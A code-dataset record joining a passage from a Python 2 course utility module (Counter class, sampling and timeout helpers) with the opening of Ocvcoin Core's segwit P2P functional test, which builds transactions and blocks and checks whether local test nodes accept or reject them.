PriorityQueue.push(self, item, self.priorityFunction(item))
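    # Illustrative usage (note that pop() here returns a (priority, item) pair):
    #   pq = PriorityQueueWithFunction(lambda item: item[1])
    #   pq.push(('b', 2)); pq.push(('a', 1))
    #   pq.pop()  # -> (1, ('a', 1))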
def manhattanDistance( xy1, xy2 ):
"Returns the Manhattan distance between points xy1 and xy2"
return abs( xy1[0] - xy2[0] ) + abs( xy1[1] - xy2[1] )
"""Data structures and functions useful for various course projects
The search project should not need anything below this line.
"""
class Counter(dict):
"""A counter keeps track of counts for a set of keys.
The counter class is an extension of the standard python
dictionary type. It is specialized to have number values
(integers or floats), and includes a handful of additional
functions to ease the task of counting data. In particular,
all keys are defaulted to have value 0. Using a dictionary:
a = {}
print a['test']
would give an error, while the Counter class analogue:
>>> a = Counter()
>>> print a['test']
0
returns the default 0 value. Note that to reference a key
that you know is contained in the counter,
you can still use the dictionary syntax:
>>> a = Counter()
>>> a['test'] = 2
>>> print a['test']
2
This is very useful for counting things without initializing their counts,
see for example:
>>> a['blah'] += 1
>>> print a['blah']
1
The counter also includes additional functionality useful in implementing
the classifiers for this assignment. Two counters can be added,
subtracted or multiplied together. See below for details. They can
also be normalized and their total count and arg max can be extracted.
"""
def __getitem__(self, idx):
self.setdefault(idx, 0)
return dict.__getitem__(self, idx)
def incrementAll(self, keys, count):
"""Increments all elements of keys by the same count.
>>> a = Counter()
>>> a.incrementAll(['one','two', 'three'], 1)
>>> a['one']
1
>>> a['two']
1
"""
for key in keys:
self[key] += count
def argMax(self):
"""Returns the key with the highest value.
"""
if len(self.keys()) == 0: return None
all = self.items()
values = [x[1] for x in all]
maxIndex = values.index(max(values))
return all[maxIndex][0]
def sortedKeys(self):
"""Returns a list of keys sorted by their values. Keys
with the highest values will appear first.
>>> a = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> a['third'] = 1
>>> a.sortedKeys()
['second', 'third', 'first']
"""
sortedItems = self.items()
compare = lambda x, y: sign(y[1] - x[1])
sortedItems.sort(cmp=compare)
return [x[0] for x in sortedItems]
def totalCount(self):
"""Returns the sum of counts for all keys.
"""
return sum(self.values())
def normalize(self):
"""Edits the counter such that the total count of all
keys sums to 1. The ratio of counts for all keys
will remain the same. Note that normalizing an empty
Counter will result in an error.
"""
total = float(self.totalCount())
if total == 0: return
for key in self.keys():
self[key] = self[key] / total
def divideAll(self, divisor):
"""Divides all counts by divisor
"""
divisor = float(divisor)
for key in self:
self[key] /= divisor
def copy(self):
"""Returns a copy of the counter
"""
return Counter(dict.copy(self))
def __mul__(self, y ):
"""Multiplying two counters gives the dot product of their vectors where
each unique label is a vector element.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['second'] = 5
>>> a['third'] = 1.5
>>> a['fourth'] = 2.5
>>> a * b
14
"""
sum = 0
x = self
if len(x) > len(y):
x,y = y,x
for key in x:
if key not in y:
continue
sum += x[key] * y[key]
return sum
def __radd__(self, y):
"""Adding another counter to a counter increments the current counter
by the values stored in the second counter.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['third'] = 1
>>> a += b
>>> a['first']
1
"""
for key, value in y.items():
self[key] += value
def __add__( self, y ):
"""Adding two counters gives a counter with the union of all keys and
counts of the second added to counts of the first.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['third'] = 1
>>> (a + b)['first']
1
"""
addend = Counter()
for key in self:
if key in y:
addend[key] = self[key] + y[key]
else:
addend[key] = self[key]
for key in y:
if key in self:
continue
addend[key] = y[key]
return addend
def __sub__( self, y ):
"""Subtracting a counter from another gives a counter with the union of all keys and
counts of the second subtracted from counts of the first.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['third'] = 1
>>> (a - b)['first']
-5
"""
addend = Counter()
for key in self:
if key in y:
addend[key] = self[key] - y[key]
else:
addend[key] = self[key]
for key in y:
if key in self:
continue
addend[key] = -1 * y[key]
return addend
def raiseNotDefined():
print "Method not implemented: %s" % inspect.stack()[1][3]
sys.exit(1)
def normalize(vectorOrCounter):
"""normalize a vector or counter by dividing each value by the sum of all values
"""
normalizedCounter = Counter()
if type(vectorOrCounter) == type(normalizedCounter):
counter = vectorOrCounter
total = float(counter.totalCount())
if total == 0: return counter
for key in counter.keys():
value = counter[key]
normalizedCounter[key] = value / total
return normalizedCounter
else:
vector = vectorOrCounter
s = float(sum(vector))
if s == 0: return vector
return [el / s for el in vector]
def nSample(distribution, values, n):
if sum(distribution) != 1:
distribution = normalize(distribution)
rand = [random.random() for i in range(n)]
rand.sort()
samples = []
samplePos, distPos, cdf = 0,0, distribution[0]
while samplePos < n:
if rand[samplePos] < cdf:
samplePos += 1
samples.append(values[distPos])
else:
distPos += 1
cdf += distribution[distPos]
return samples
def sample(distribution, values = None):
if type(distribution) == Counter:
items = distribution.items()
distribution = [i[1] for i in items]
values = [i[0] for i in items]
if sum(distribution) != 1:
distribution = normalize(distribution)
choice = random.random()
i, total= 0, distribution[0]
while choice > total:
i += 1
total += distribution[i]
return values[i]
def sampleFromCounter(ctr):
items = ctr.items()
return sample([v for k,v in items], [k for k,v in items])
def getProbability(value, distribution, values):
"""Gives the probability of a value under a discrete distribution
defined by (distributions, values).
"""
total = 0.0
for prob, val in zip(distribution, values):
if val == value:
total += prob
return total
def flipCoin( p ):
r = random.random()
return r < p
def chooseFromDistribution( distribution ):
"Takes either a counter or a list of (prob, key) pairs and samples"
if type(distribution) == dict or type(distribution) == Counter:
return sample(distribution)
r = random.random()
base = 0.0
for prob, element in distribution:
base += prob
if r <= base: return element
def nearestPoint( pos ):
"""Finds the nearest grid point to a position (discretizes).
"""
( current_row, current_col ) = pos
grid_row = int( current_row + 0.5 )
grid_col = int( current_col + 0.5 )
return ( grid_row, grid_col )
def sign( x ):
"""Returns 1 or -1 depending on the sign of x
"""
if( x >= 0 ):
return 1
else:
return -1
def arrayInvert(array):
"""Inverts a matrix stored as a list of lists.
"""
result = [[] for i in array]
for outer in array:
for inner in range(len(outer)):
result[inner].append(outer[inner])
return result
def matrixAsList( matrix, value = True ):
"""Turns a matrix into a list of coordinates matching the specified value
"""
rows, cols = len( matrix ), len( matrix[0] )
cells = []
for row in range( rows ):
for col in range( cols ):
if matrix[row][col] == value:
cells.append( ( row, col ) )
return cells
def lookup(name, namespace):
"""Get a method or class from any imported module from its name.
Usage: lookup(functionName, globals())
"""
dots = name.count('.')
if dots > 0:
moduleName, objName = '.'.join(name.split('.')[:-1]), name.split('.')[-1]
module = __import__(moduleName)
return getattr(module, objName)
else:
modules = [obj for obj in namespace.values() if str(type(obj)) == "<type 'module'>"]
options = [getattr(module, name) for module in modules if name in dir(module)]
options += [obj[1] for obj in namespace.items() if obj[0] == name ]
if len(options) == 1: return options[0]
        if len(options) > 1: raise Exception, 'Name conflict for %s' % name
raise Exception, '%s not found as a method or class' % name
def pause():
"""Pauses the output stream awaiting user feedback.
"""
print "<Press enter/return to continue>"
raw_input()
## code to handle timeouts
import signal
class TimeoutFunctionException(Exception):
"""Exception to raise on a timeout"""
pass
class TimeoutFunction:
def __init__(self, function, timeout):
"timeout must be at least 1 second. WHY??"
self.timeout = timeout
self.function = function
def handle_timeout(self, signum, frame):
raise TimeoutFunctionException()
def __call__(self, *args):
if not 'SIGALRM' in dir(signal):
return self.function(*args)
old = signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.timeout)
try:
result = self.function(*args)
finally:
signal.signal(signal.SIGALRM, old)
signal.alarm(0)
return result
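# Illustrative usage:
#   bounded = TimeoutFunction(expensiveFunction, 30)
#   try:
#       result = bounded(args)
#   except TimeoutFunctionException:
#       result = None  # gave up after 30 seconds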
| [
"[email protected]"
] | |
3691083811d7321c87cdbb05e8c670f027fec3f9 | 5167f77d96d1dc5412a8a0a91c95e3086acd05dc | /test/functional/p2p_segwit.py | ceccca331b56c3e9dca0b314718090ac21ff9ef9 | [
"MIT"
] | permissive | ocvcoin/ocvcoin | 04fb0cea7c11bf52e07ea06ddf9df89631eced5f | 79c3803e330f32ed50c02ae657ff9aded6297b9d | refs/heads/master | 2023-04-30T10:42:05.457630 | 2023-04-15T11:49:40 | 2023-04-15T11:49:40 | 406,011,904 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 100,563 | py | #!/usr/bin/env python3
# Copyright (c) 2016-2020 The Ocvcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test segwit transactions and blocks on P2P network."""
from decimal import Decimal
import math
import random
import struct
import time
from test_framework.blocktools import create_block, create_coinbase, add_witness_commitment, get_witness_script, WITNESS_COMMITMENT_HEADER
from test_framework.key import ECKey
from test_framework.messages import (
BIP125_SEQUENCE_NUMBER,
CBlock,
CBlockHeader,
CInv,
COutPoint,
CTransaction,
CTxIn,
CTxInWitness,
CTxOut,
CTxWitness,
MAX_BLOCK_BASE_SIZE,
MSG_BLOCK,
MSG_TX,
MSG_WITNESS_FLAG,
MSG_WITNESS_TX,
MSG_WTX,
NODE_NETWORK,
NODE_WITNESS,
msg_no_witness_block,
msg_getdata,
msg_headers,
msg_inv,
msg_tx,
msg_block,
msg_no_witness_tx,
ser_uint256,
ser_vector,
sha256,
tx_from_hex,
)
from test_framework.p2p import (
P2PInterface,
p2p_lock,
)
from test_framework.script import (
CScript,
CScriptNum,
CScriptOp,
MAX_SCRIPT_ELEMENT_SIZE,
OP_0,
OP_1,
OP_2,
OP_16,
OP_2DROP,
OP_CHECKMULTISIG,
OP_CHECKSIG,
OP_DROP,
OP_ELSE,
OP_ENDIF,
OP_IF,
OP_RETURN,
OP_TRUE,
SIGHASH_ALL,
SIGHASH_ANYONECANPAY,
SIGHASH_NONE,
SIGHASH_SINGLE,
SegwitV0SignatureHash,
LegacySignatureHash,
hash160,
)
from test_framework.script_util import (
key_to_p2wpkh_script,
keyhash_to_p2pkh_script,
script_to_p2sh_script,
script_to_p2wsh_script,
)
from test_framework.test_framework import OcvcoinTestFramework
from test_framework.util import (
assert_equal,
softfork_active,
hex_str_to_bytes,
assert_raises_rpc_error,
)
# The versionbit bit used to signal activation of SegWit
VB_WITNESS_BIT = 1
VB_TOP_BITS = 0x20000000
MAX_SIGOP_COST = 80000
SEGWIT_HEIGHT = 120
class UTXO():
"""Used to keep track of anyone-can-spend outputs that we can use in the tests."""
def __init__(self, sha256, n, value):
self.sha256 = sha256
self.n = n
self.nValue = value
def sign_p2pk_witness_input(script, tx_to, in_idx, hashtype, value, key):
"""Add signature for a P2PK witness program."""
tx_hash = SegwitV0SignatureHash(script, tx_to, in_idx, hashtype, value)
signature = key.sign_ecdsa(tx_hash) + chr(hashtype).encode('latin-1')
tx_to.wit.vtxinwit[in_idx].scriptWitness.stack = [signature, script]
tx_to.rehash()
def get_virtual_size(witness_block):
"""Calculate the virtual size of a witness block.
Virtual size is base + witness/4."""
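    # e.g. (illustrative numbers) base_size=200 and total_size=260 give
    # int((3*200 + 260 + 3) / 4) = 215 virtual bytes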
base_size = len(witness_block.serialize(with_witness=False))
total_size = len(witness_block.serialize())
# the "+3" is so we round up
vsize = int((3 * base_size + total_size + 3) / 4)
return vsize
def test_transaction_acceptance(node, p2p, tx, with_witness, accepted, reason=None):
"""Send a transaction to the node and check that it's accepted to the mempool
- Submit the transaction over the p2p interface
- use the getrawmempool rpc to check for acceptance."""
reason = [reason] if reason else []
with node.assert_debug_log(expected_msgs=reason):
p2p.send_and_ping(msg_tx(tx) if with_witness else msg_no_witness_tx(tx))
assert_equal(tx.hash in node.getrawmempool(), accepted)
def test_witness_block(node, p2p, block, accepted, with_witness=True, reason=None):
"""Send a block to the node and check that it's accepted
- Submit the block over the p2p interface
- use the getbestblockhash rpc to check for acceptance."""
reason = [reason] if reason else []
with node.assert_debug_log(expected_msgs=reason):
p2p.send_and_ping(msg_block(block) if with_witness else msg_no_witness_block(block))
assert_equal(node.getbestblockhash() == block.hash, accepted)
class TestP2PConn(P2PInterface):
def __init__(self, wtxidrelay=False):
super().__init__(wtxidrelay=wtxidrelay)
self.getdataset = set()
self.last_wtxidrelay = []
self.lastgetdata = []
self.wtxidrelay = wtxidrelay
# Don't send getdata message replies to invs automatically.
# We'll send the getdata messages explicitly in the test logic.
def on_inv(self, message):
pass
def on_getdata(self, message):
self.lastgetdata = message.inv
for inv in message.inv:
self.getdataset.add(inv.hash)
def on_wtxidrelay(self, message):
self.last_wtxidrelay.append(message)
def announce_tx_and_wait_for_getdata(self, tx, success=True, use_wtxid=False):
if success:
# sanity check
assert (self.wtxidrelay and use_wtxid) or (not self.wtxidrelay and not use_wtxid)
with p2p_lock:
self.last_message.pop("getdata", None)
if use_wtxid:
wtxid = tx.calc_sha256(True)
self.send_message(msg_inv(inv=[CInv(MSG_WTX, wtxid)]))
else:
self.send_message(msg_inv(inv=[CInv(MSG_TX, tx.sha256)]))
if success:
if use_wtxid:
self.wait_for_getdata([wtxid])
else:
self.wait_for_getdata([tx.sha256])
else:
time.sleep(5)
assert not self.last_message.get("getdata")
def announce_block_and_wait_for_getdata(self, block, use_header, timeout=60):
with p2p_lock:
self.last_message.pop("getdata", None)
self.last_message.pop("getheaders", None)
msg = msg_headers()
msg.headers = [CBlockHeader(block)]
if use_header:
self.send_message(msg)
else:
self.send_message(msg_inv(inv=[CInv(MSG_BLOCK, block.sha256)]))
self.wait_for_getheaders()
self.send_message(msg)
self.wait_for_getdata([block.sha256])
def request_block(self, blockhash, inv_type, timeout=60):
with p2p_lock:
self.last_message.pop("block", None)
self.send_message(msg_getdata(inv=[CInv(inv_type, blockhash)]))
self.wait_for_block(blockhash, timeout)
return self.last_message["block"].block
class SegWitTest(OcvcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
# This test tests SegWit both pre and post-activation, so use the normal BIP9 activation.
self.extra_args = [
["-acceptnonstdtxn=1", "-segwitheight={}".format(SEGWIT_HEIGHT), "[email protected]"],
["-acceptnonstdtxn=0", "-segwitheight={}".format(SEGWIT_HEIGHT)],
["-acceptnonstdtxn=1", "-segwitheight=-1"],
]
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
self.setup_nodes()
self.connect_nodes(0, 1)
self.connect_nodes(0, 2)
self.sync_all()
# Helper functions
def build_next_block(self, version=4):
"""Build a block on top of node0's tip."""
tip = self.nodes[0].getbestblockhash()
height = self.nodes[0].getblockcount() + 1
block_time = self.nodes[0].getblockheader(tip)["mediantime"] + 1
block = create_block(int(tip, 16), create_coinbase(height), block_time)
block.nVersion = version
block.rehash()
return block
def update_witness_block_with_transactions(self, block, tx_list, nonce=0):
"""Add list of transactions to block, adds witness commitment, then solves."""
block.vtx.extend(tx_list)
add_witness_commitment(block, nonce)
block.solve()
def run_test(self):
# Setup the p2p connections
# self.test_node sets NODE_WITNESS|NODE_NETWORK
self.test_node = self.nodes[0].add_p2p_connection(TestP2PConn(), services=NODE_NETWORK | NODE_WITNESS)
# self.old_node sets only NODE_NETWORK
self.old_node = self.nodes[0].add_p2p_connection(TestP2PConn(), services=NODE_NETWORK)
# self.std_node is for testing node1 (fRequireStandard=true)
self.std_node = self.nodes[1].add_p2p_connection(TestP2PConn(), services=NODE_NETWORK | NODE_WITNESS)
# self.std_wtx_node is for testing node1 with wtxid relay
self.std_wtx_node = self.nodes[1].add_p2p_connection(TestP2PConn(wtxidrelay=True), services=NODE_NETWORK | NODE_WITNESS)
assert self.test_node.nServices & NODE_WITNESS != 0
# Keep a place to store utxo's that can be used in later tests
self.utxo = []
self.log.info("Starting tests before segwit activation")
self.segwit_active = False
self.test_non_witness_transaction()
self.test_v0_outputs_arent_spendable()
self.test_block_relay()
self.test_getblocktemplate_before_lockin()
self.test_unnecessary_witness_before_segwit_activation()
self.test_witness_tx_relay_before_segwit_activation()
self.test_standardness_v0()
self.log.info("Advancing to segwit activation")
self.advance_to_segwit_active()
# Segwit status 'active'
self.test_p2sh_witness()
self.test_witness_commitments()
self.test_block_malleability()
self.test_witness_block_size()
self.test_submit_block()
self.test_extra_witness_data()
self.test_max_witness_push_length()
self.test_max_witness_program_length()
self.test_witness_input_length()
self.test_block_relay()
self.test_tx_relay_after_segwit_activation()
self.test_standardness_v0()
self.test_segwit_versions()
self.test_premature_coinbase_witness_spend()
self.test_uncompressed_pubkey()
self.test_signature_version_1()
self.test_non_standard_witness_blinding()
self.test_non_standard_witness()
self.test_upgrade_after_activation()
self.test_witness_sigops()
self.test_superfluous_witness()
self.test_wtxid_relay()
# Individual tests
def subtest(func): # noqa: N805
"""Wraps the subtests for logging and state assertions."""
def func_wrapper(self, *args, **kwargs):
self.log.info("Subtest: {} (Segwit active = {})".format(func.__name__, self.segwit_active))
# Assert segwit status is as expected
assert_equal(softfork_active(self.nodes[0], 'segwit'), self.segwit_active)
func(self, *args, **kwargs)
# Each subtest should leave some utxos for the next subtest
assert self.utxo
self.sync_blocks()
# Assert segwit status is as expected at end of subtest
assert_equal(softfork_active(self.nodes[0], 'segwit'), self.segwit_active)
return func_wrapper
@subtest # type: ignore
def test_non_witness_transaction(self):
"""See if sending a regular transaction works, and create a utxo to use in later tests."""
# Mine a block with an anyone-can-spend coinbase,
# let it mature, then try to spend it.
block = self.build_next_block(version=1)
block.solve()
self.test_node.send_and_ping(msg_no_witness_block(block)) # make sure the block was processed
txid = block.vtx[0].sha256
self.nodes[0].generate(99) # let the block mature
# Create a transaction that spends the coinbase
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(txid, 0), b""))
tx.vout.append(CTxOut(49 * 100000000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
tx.calc_sha256()
# Check that serializing it with or without witness is the same
# This is a sanity check of our testing framework.
assert_equal(msg_no_witness_tx(tx).serialize(), msg_tx(tx).serialize())
self.test_node.send_and_ping(msg_tx(tx)) # make sure the block was processed
assert tx.hash in self.nodes[0].getrawmempool()
# Save this transaction for later
self.utxo.append(UTXO(tx.sha256, 0, 49 * 100000000))
self.nodes[0].generate(1)
@subtest # type: ignore
def test_unnecessary_witness_before_segwit_activation(self):
"""Verify that blocks with witnesses are rejected before activation."""
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, CScript([OP_TRUE])))
tx.wit.vtxinwit.append(CTxInWitness())
tx.wit.vtxinwit[0].scriptWitness.stack = [CScript([CScriptNum(1)])]
# Verify the hash with witness differs from the txid
# (otherwise our testing framework must be broken!)
tx.rehash()
assert tx.sha256 != tx.calc_sha256(with_witness=True)
# Construct a segwit-signaling block that includes the transaction.
block = self.build_next_block(version=(VB_TOP_BITS | (1 << VB_WITNESS_BIT)))
self.update_witness_block_with_transactions(block, [tx])
# Sending witness data before activation is not allowed (anti-spam
# rule).
test_witness_block(self.nodes[0], self.test_node, block, accepted=False, reason='unexpected-witness')
# But it should not be permanently marked bad...
# Resend without witness information.
self.test_node.send_and_ping(msg_no_witness_block(block)) # make sure the block was processed
assert_equal(self.nodes[0].getbestblockhash(), block.hash)
# Update our utxo list; we spent the first entry.
self.utxo.pop(0)
self.utxo.append(UTXO(tx.sha256, 0, tx.vout[0].nValue))
@subtest # type: ignore
def test_block_relay(self):
"""Test that block requests to NODE_WITNESS peer are with MSG_WITNESS_FLAG.
This is true regardless of segwit activation.
Also test that we don't ask for blocks from unupgraded peers."""
blocktype = 2 | MSG_WITNESS_FLAG
# test_node has set NODE_WITNESS, so all getdata requests should be for
# witness blocks.
# Test announcing a block via inv results in a getdata, and that
# announcing a version 4 or random VB block with a header results in a getdata
block1 = self.build_next_block()
block1.solve()
self.test_node.announce_block_and_wait_for_getdata(block1, use_header=False)
assert self.test_node.last_message["getdata"].inv[0].type == blocktype
test_witness_block(self.nodes[0], self.test_node, block1, True)
block2 = self.build_next_block(version=4)
block2.solve()
self.test_node.announce_block_and_wait_for_getdata(block2, use_header=True)
assert self.test_node.last_message["getdata"].inv[0].type == blocktype
test_witness_block(self.nodes[0], self.test_node, block2, True)
block3 = self.build_next_block(version=(VB_TOP_BITS | (1 << 15)))
block3.solve()
self.test_node.announce_block_and_wait_for_getdata(block3, use_header=True)
assert self.test_node.last_message["getdata"].inv[0].type == blocktype
test_witness_block(self.nodes[0], self.test_node, block3, True)
# Check that we can getdata for witness blocks or regular blocks,
# and that the serialization returned in each case is correct.
if not self.segwit_active:
# Before activation, we should be able to request old blocks with
# or without witness, and they should be the same.
chain_height = self.nodes[0].getblockcount()
# Pick 10 random blocks on main chain, and verify that getdata's
# for MSG_BLOCK, MSG_WITNESS_BLOCK, and rpc getblock() are equal.
all_heights = list(range(chain_height + 1))
random.shuffle(all_heights)
all_heights = all_heights[0:10]
for height in all_heights:
block_hash = self.nodes[0].getblockhash(height)
rpc_block = self.nodes[0].getblock(block_hash, False)
block_hash = int(block_hash, 16)
block = self.test_node.request_block(block_hash, 2)
wit_block = self.test_node.request_block(block_hash, 2 | MSG_WITNESS_FLAG)
assert_equal(block.serialize(), wit_block.serialize())
assert_equal(block.serialize(), hex_str_to_bytes(rpc_block))
else:
# After activation, witness blocks and non-witness blocks should
# be different. Verify rpc getblock() returns witness blocks, while
# getdata respects the requested type.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [])
# This gives us a witness commitment.
assert len(block.vtx[0].wit.vtxinwit) == 1
assert len(block.vtx[0].wit.vtxinwit[0].scriptWitness.stack) == 1
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Now try to retrieve it...
rpc_block = self.nodes[0].getblock(block.hash, False)
non_wit_block = self.test_node.request_block(block.sha256, 2)
wit_block = self.test_node.request_block(block.sha256, 2 | MSG_WITNESS_FLAG)
assert_equal(wit_block.serialize(), hex_str_to_bytes(rpc_block))
assert_equal(wit_block.serialize(False), non_wit_block.serialize())
assert_equal(wit_block.serialize(), block.serialize())
# Test size, vsize, weight
rpc_details = self.nodes[0].getblock(block.hash, True)
assert_equal(rpc_details["size"], len(block.serialize()))
assert_equal(rpc_details["strippedsize"], len(block.serialize(False)))
weight = 3 * len(block.serialize(False)) + len(block.serialize())
assert_equal(rpc_details["weight"], weight)
# An upgraded node should not ask for blocks from unupgraded peers.
block4 = self.build_next_block(version=4)
block4.solve()
self.old_node.getdataset = set()
# Blocks can be requested via direct-fetch (immediately upon processing the announcement)
# or via parallel download (with an indeterminate delay from processing the announcement)
# so to test that a block is NOT requested, we could guess a time period to sleep for,
# and then check. We can avoid the sleep() by taking advantage of transaction getdata's
# being processed after block getdata's, and announce a transaction as well,
# and then check to see if that particular getdata has been received.
# Since 0.14, inv's will only be responded to with a getheaders, so send a header
# to announce this block.
msg = msg_headers()
msg.headers = [CBlockHeader(block4)]
self.old_node.send_message(msg)
self.old_node.announce_tx_and_wait_for_getdata(block4.vtx[0])
assert block4.sha256 not in self.old_node.getdataset
@subtest # type: ignore
def test_v0_outputs_arent_spendable(self):
"""Test that v0 outputs aren't spendable before segwit activation.
~6 months after segwit activation, the SCRIPT_VERIFY_WITNESS flag was
backdated so that it applies to all blocks, going back to the genesis
block.
Consequently, version 0 witness outputs are never spendable without
witness, and so can't be spent before segwit activation (the point at which
blocks are permitted to contain witnesses)."""
# node2 doesn't need to be connected for this test.
# (If it's connected, node0 may propagate an invalid block to it over
# compact blocks and the nodes would have inconsistent tips.)
self.disconnect_nodes(0, 2)
# Create two outputs, a p2wsh and p2sh-p2wsh
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
p2sh_script_pubkey = script_to_p2sh_script(script_pubkey)
value = self.utxo[0].nValue // 3
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b'')]
tx.vout = [CTxOut(value, script_pubkey), CTxOut(value, p2sh_script_pubkey)]
tx.vout.append(CTxOut(value, CScript([OP_TRUE])))
tx.rehash()
txid = tx.sha256
# Add it to a block
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
# Verify that segwit isn't activated. A block serialized with witness
# should be rejected prior to activation.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False, with_witness=True, reason='unexpected-witness')
# Now send the block without witness. It should be accepted
test_witness_block(self.nodes[0], self.test_node, block, accepted=True, with_witness=False)
# Now try to spend the outputs. This should fail since SCRIPT_VERIFY_WITNESS is always enabled.
p2wsh_tx = CTransaction()
p2wsh_tx.vin = [CTxIn(COutPoint(txid, 0), b'')]
p2wsh_tx.vout = [CTxOut(value, CScript([OP_TRUE]))]
p2wsh_tx.wit.vtxinwit.append(CTxInWitness())
p2wsh_tx.wit.vtxinwit[0].scriptWitness.stack = [CScript([OP_TRUE])]
p2wsh_tx.rehash()
p2sh_p2wsh_tx = CTransaction()
p2sh_p2wsh_tx.vin = [CTxIn(COutPoint(txid, 1), CScript([script_pubkey]))]
p2sh_p2wsh_tx.vout = [CTxOut(value, CScript([OP_TRUE]))]
p2sh_p2wsh_tx.wit.vtxinwit.append(CTxInWitness())
p2sh_p2wsh_tx.wit.vtxinwit[0].scriptWitness.stack = [CScript([OP_TRUE])]
p2sh_p2wsh_tx.rehash()
for tx in [p2wsh_tx, p2sh_p2wsh_tx]:
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
# When the block is serialized with a witness, the block will be rejected because witness
# data isn't allowed in blocks that don't commit to witness data.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False, with_witness=True, reason='unexpected-witness')
# When the block is serialized without witness, validation fails because the transaction is
# invalid (transactions are always validated with SCRIPT_VERIFY_WITNESS so a segwit v0 transaction
# without a witness is invalid).
# Note: The reject reason for this failure could be
# 'block-validation-failed' (if script check threads > 1) or
# 'non-mandatory-script-verify-flag (Witness program was passed an
# empty witness)' (otherwise).
# TODO: support multiple acceptable reject reasons.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False, with_witness=False)
self.connect_nodes(0, 2)
self.utxo.pop(0)
self.utxo.append(UTXO(txid, 2, value))
@subtest # type: ignore
def test_getblocktemplate_before_lockin(self):
txid = int(self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1), 16)
for node in [self.nodes[0], self.nodes[2]]:
gbt_results = node.getblocktemplate({"rules": ["segwit"]})
if node == self.nodes[2]:
# If this is a non-segwit node, we should not get a witness
# commitment.
assert 'default_witness_commitment' not in gbt_results
else:
# For segwit-aware nodes, check the witness
# commitment is correct.
assert 'default_witness_commitment' in gbt_results
witness_commitment = gbt_results['default_witness_commitment']
# Check that the default_witness_commitment matches what we compute.
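# (The witness merkle root is computed over wtxids, with the coinbase
# wtxid defined as all zero bytes; the wallet tx's wtxid must equal its
# txid here, otherwise the assert below would fail.)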
witness_root = CBlock.get_merkle_root([ser_uint256(0),
ser_uint256(txid)])
script = get_witness_script(witness_root, 0)
assert_equal(witness_commitment, script.hex())
# Clear out the mempool
self.nodes[0].generate(1)
self.sync_blocks()
@subtest # type: ignore
def test_witness_tx_relay_before_segwit_activation(self):
# Generate a transaction that doesn't require a witness, but send it
# with a witness. Should be rejected for premature-witness, but should
# not be added to recently rejected list.
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
tx.wit.vtxinwit.append(CTxInWitness())
tx.wit.vtxinwit[0].scriptWitness.stack = [b'a']
tx.rehash()
tx_hash = tx.sha256
tx_value = tx.vout[0].nValue
# Verify that if a peer doesn't set nServices to include NODE_WITNESS,
# the getdata is just for the non-witness portion.
self.old_node.announce_tx_and_wait_for_getdata(tx)
assert self.old_node.last_message["getdata"].inv[0].type == MSG_TX
# Since we haven't delivered the tx yet, inv'ing the same tx from
# a witness transaction ought not result in a getdata.
self.test_node.announce_tx_and_wait_for_getdata(tx, success=False)
# Delivering this transaction with a witness should fail (no matter
# who it's from).
assert_equal(len(self.nodes[0].getrawmempool()), 0)
assert_equal(len(self.nodes[1].getrawmempool()), 0)
test_transaction_acceptance(self.nodes[0], self.old_node, tx, with_witness=True, accepted=False)
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=True, accepted=False)
# But eliminating the witness should fix it
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=False, accepted=True)
# Cleanup: mine the first transaction and update utxo
self.nodes[0].generate(1)
assert_equal(len(self.nodes[0].getrawmempool()), 0)
self.utxo.pop(0)
self.utxo.append(UTXO(tx_hash, 0, tx_value))
@subtest # type: ignore
def test_standardness_v0(self):
"""Test V0 txout standardness.
V0 segwit outputs and inputs are always standard.
V0 segwit inputs may only be mined after activation."""
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
p2sh_script_pubkey = script_to_p2sh_script(witness_program)
# First prepare a p2sh output (so that spending it will pass standardness)
p2sh_tx = CTransaction()
p2sh_tx.vin = [CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b"")]
p2sh_tx.vout = [CTxOut(self.utxo[0].nValue - 1000, p2sh_script_pubkey)]
p2sh_tx.rehash()
# Mine it on test_node to create the confirmed output.
test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_tx, with_witness=True, accepted=True)
self.nodes[0].generate(1)
self.sync_blocks()
# Now test standardness of v0 P2WSH outputs.
# Start by creating a transaction with two outputs.
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(p2sh_tx.sha256, 0), CScript([witness_program]))]
tx.vout = [CTxOut(p2sh_tx.vout[0].nValue - 10000, script_pubkey)]
